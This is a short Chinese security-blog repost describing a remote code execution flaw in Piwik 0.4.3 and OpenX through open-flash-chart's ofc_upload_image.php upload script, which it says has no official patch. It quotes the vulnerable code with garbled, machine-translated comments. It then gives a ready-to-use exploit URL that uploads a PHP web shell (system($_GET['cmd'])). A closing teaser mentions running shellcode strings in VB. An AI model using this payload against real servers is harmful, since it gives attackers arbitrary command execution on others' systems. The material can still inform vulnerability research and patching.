测试通过的版本,本地测试成功: Piwik 0.4.3 目前官方还没给出补丁 |
分析代码:
/*这个临时文件,我们将上传的图像文件保存默认路径*/ /*检查是否存在$ default_path变量*/ /*如果属实,使具有写入权限的目录*/ /*然后,创建在与上面的文件名称的目录从形式输入“名称”*文件/ $destination = $default_path . basename( $_GET[ 'name' ] ); 保存您的图象: '. $destination; /*恶意代码在这里,并且攻击者能执行这个代码*/ |
Exp 利用程序: http://www.***.com/lazivip/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?> |
文章来源于lcx.cc:Piwik和OpenX多版本存在PHP远程执行漏洞
相关推荐: 【VB】VB 直接执行字符串 ShellCode 的代码
VB 程序内直接执行文本字符串形式的 ShellCode 代码: 这个没什么说的,黑色加粗的是 Hex 十六进制字符串形式的 ShellCode。注释部分是另外一种执行方法,直接执行 bin 二进制格式的 Byte 数组(可以事先放入到资源中,用的时候…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论